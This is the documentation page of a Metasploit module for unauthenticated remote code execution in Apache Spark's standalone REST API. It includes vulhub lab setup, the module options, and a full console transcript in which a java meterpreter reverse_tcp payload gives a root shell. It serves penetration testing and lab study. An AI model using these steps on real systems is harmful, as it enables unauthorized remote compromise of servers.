dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/linux/http/spark_unauth_rce.md

2.3 KiB
Raw Permalink Blame History

Description

This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API. It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

Verification Steps

https://github.com/vulhub/vulhub/tree/master/spark/unacc

docker-compose up -d

Verification Steps

  1. get session on target
  2. use exploit/linux/http/spark_unauth_rce
  3. set payload <payload>
  4. set rhosts <rhosts>
  5. set rport <rport>
  6. set srvhost <srvhost>
  7. set srvport <srvport>
  8. set lport <lport>
  9. set lhost <lhost>
  10. exploit

Scenarios

Spark 2.3.1

msf5 > use exploit/linux/http/spark_unauth_rce
msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066
rport => 6066
msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167
srvhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999
srvport => 9999
msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167
lhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555
lport => 5555
msf5 exploit(linux/http/spark_unauth_rce) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.139.14.167:5555
msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ...
[*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI
[*] 127.0.0.1:6066 - Sending the payload to the server...
[*] Sending stage (53867 bytes) to 10.139.14.167
[*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions

Active sessions
===============

  Id  Name  Type                    Information          Connection
  --  ----  ----                    -----------          ----------
  2         meterpreter java/linux  root @ 96b2135aee9c  10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1)

msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter >